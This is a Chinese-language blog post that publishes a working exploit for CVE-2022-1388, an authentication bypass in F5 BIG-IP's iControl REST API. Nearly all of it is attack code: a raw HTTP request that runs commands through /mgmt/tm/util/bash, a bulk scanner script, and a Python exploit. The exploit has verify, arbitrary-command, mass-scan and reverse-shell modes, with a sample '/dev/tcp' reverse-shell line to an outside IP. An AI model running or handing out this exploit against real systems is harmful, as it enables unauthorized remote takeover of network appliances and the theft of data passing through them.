CVE-2022-1388-EXP(F5-BIGIP)

最新推荐文章于 2024-05-16 12:02:13 发布

三鲜水饺子

最新推荐文章于 2024-05-16 12:02:13 发布

阅读量1k

点赞数 2

分类专栏：漏洞库文章标签： python 开发语言

本文链接：https://blog.csdn.net/weixin_43080961/article/details/124776630

版权

漏洞库专栏收录该内容

13 篇文章 2 订阅

订阅专栏

简介

F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。

EXP

POST /mgmt/tm/util/bash HTTP/1.1
Host: 
X-F5-Auth-Token: a
Authorization: Basic YWRtaW46

Connection: keep-alive, x-F5-Auth-Token
Content-Length: 0
Cache-Control: max-age=0
{
"command":"run",
"utilCmdArgs":"-c id"
}

批量脚本

check.py

#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved
#
# @Time    : 2022/5/7 23:40
# @Author  : Caps
# @Email   : admin@safeinfo.me
# @File    : check.py
# @Software: PyCharm
import requests
import argparse

requests.packages.urllib3.disable_warnings()


def usage():
    print('''
    +-----------------------------------------------------------------+
    漏洞名称: F5 BIG-IP iControl Rest API exposed Check
    功能：单个检测，批量检测                                     
    单个检测：python exp.py -u url
    批量检测：python exp.py -f url.txt
    +-----------------------------------------------------------------+                                     
    ''')


def check(url):
    try:
        target_url = url + "/mgmt/shared/authn/login"
        res = requests.get(target_url, verify=False, timeout=3)
        if "resterrorresponse" in res.text:
            print(f"\033[0;31;22m[+] Host: {url} F5 iControl Rest API exposed \033[0m")
        else:
            print(f"\033[0;32;22m[-] Host: {url} F5 not vulnerability \033[0m")
    except Exception as e:
        print(f"\033[0;33;22m[x] Host: {url} Connection Fail \033[0m")


def run(filepath):
    urls = [x.strip() for x in open(filepath, "r").readlines()]
    for u in urls:
        check(u)
    return check


def main():
    parse = argparse.ArgumentParser()
    parse.add_argument("-u", "--url", help="Please Poc.py -u host")
    parse.add_argument("-f", "--file", help="Please poc.py -f file")
    args = parse.parse_args()
    url = args.url
    filepath = args.file
    if url is not None and filepath is None:
        check(url)
    elif url is None and filepath is not None:
        run(filepath)
    else:
        usage()


if __name__ == '__main__':
    main()

exp.py

#!/usr/bin/python3.9
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 Caps, Inc. All Rights Reserved 
#
# @Time    : 2022/5/9 16:52
# @Author  : Caps
# @Email   : admin@safeinfo.me
# @File    : CVE-2022-1388.py
# @Software: PyCharm
import requests
import sys
import argparse
import json
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

t = int(time.time())


def title():
    print('''
     _____  _   _  _____        _____  _____  _____  _____        __   _____  _____  _____ 
    /  __ \| | | ||  ___|      / __  \|  _  |/ __  \/ __  \      /  | |____ ||  _  ||  _  |
    | /  \/| | | || |__  ______`' / /'| |/' |`' / /'`' / /'______`| |     / / \ V /  \ V / 
    | |    | | | ||  __||______| / /  |  /| |  / /    / / |______|| |     \ \ / _ \  / _ \ 
    | \__/\\ \_/ /| |___       ./ /___\ |_/ /./ /___./ /___      _| |_.___/ /| |_| || |_| |
     \____/ \___/ \____/       \_____/ \___/ \_____/\_____/      \___/\____/ \_____/\_____/                                                                                                                                                                                                                                                          
                                                        Author:Caps@BUGFOR
                                                        Github:https://github.com/bytecaps
    ''')
    print('''
        验证模式：python CVE_2022_1388.py -v true -u target_url 
        攻击模式：python CVE_2022_1388.py -a true -u target_url -c command 
        批量检测：python CVE_2022_1388.py -s true -f file
        反弹模式：python CVE_2022_1388.py -r true -u target_url -c command 
        ''')


def headers():
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
        'Content-Type': 'application/json',
        'Connection': 'keep-alive, x-F5-Auth-Token',
        'X-F5-Auth-Token': 'a',
        'Authorization': 'Basic YWRtaW46'
    }
    return headers


def check(target_url):
    check_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c id"}
    try:
        response = requests.post(url=check_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            print("[+] 目标 {} 存在漏洞".format(target_url))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {0}'.format(target_url))


def attack(target_url, cmd):
    attack_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(cmd)}
    try:
        response = requests.post(url=attack_url, json=data, headers=headers(), verify=False, timeout=5)
        if response.status_code == 200 and 'commandResult' in response.text:
            default = json.loads(response.text)
            display = default['commandResult']
            print("[+] 目标 {} 存在漏洞".format(target_url))
            print('[+] 响应为:{0}'.format(display))
        else:
            print("[-] 目标 {} 不存在漏洞".format(target_url))
    except Exception as e:
        print('url 访问异常 {0}'.format(target_url))


def reverse_shell(target_url, command):
    reverse_url = target_url + '/mgmt/tm/util/bash'
    data = {'command': "run", 'utilCmdArgs': "-c '{0}'".format(command)}
    # command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1
    try:
        requests.post(url=reverse_url, json=data, headers=headers(), verify=False, timeout=5)
    except Exception as e:
        print("[+] 请自行查看是否反弹shell回来")


def scan(file):
    for url_link in open(file, 'r', encoding='utf-8'):
        if url_link.strip() != '':
            url_path = format_url(url_link.strip())
            check(url_path)


def format_url(url):
    try:
        if url[:4] != "http":
            url = "https://" + url
            url = url.strip()
        return url
    except Exception as e:
        print('URL 错误 {0}'.format(url))


def main():
    parser = argparse.ArgumentParser("F5 Big-IP RCE")
    parser.add_argument('-v', '--verify', type=bool, help=' 验证模式 ')
    parser.add_argument('-u', '--url', type=str, help=' 目标URL ')

    parser.add_argument('-a', '--attack', type=bool, help=' 攻击模式 ')
    parser.add_argument('-c', '--command', type=str, default="id", help=' 执行命令 ')

    parser.add_argument('-s', '--scan', type=bool, help=' 批量模式 ')
    parser.add_argument('-f', '--file', type=str, help=' 文件路径 ')

    parser.add_argument('-r', '--shell', type=bool, help=' 反弹shell模式 ')
    args = parser.parse_args()

    verify_model = args.verify
    url = args.url

    attack_model = args.attack
    command = args.command

    scan_model = args.scan
    file = args.file

    shell_model = args.shell

    if verify_model is True and url is not None:
        check(url)
    elif attack_model is True and url is not None and command is not None:
        attack(url, command)
    elif scan_model is True and file is not None:
        scan(file)
    elif shell_model is True and url is not None and command is not None:
        reverse_shell(url, command)
    else:
        sys.exit(0)


if __name__ == '__main__':
    title()
    main()

BIG-IP(CVE-2022-1388)从修复方案分析出exp从官方修复方案步步推测分析攻击payload。https://mp.weixin.qq.com/s/6gVZVRSDRmeGcNYjTldw1Q

三鲜水饺子

关注

2
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
CVE-2022-1388-EXP(F5-BIGIP)

简介F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。EXPPOST /mgmt/tm/util/bash HTTP/1.1Host: X-F5-Auth-Token: aAuthorization: Basic YWRtaW46Connection: keep-alive, x-F5-Auth-TokenContent-Length: 0Cache-Control: max-age=0{
复制链接

扫一扫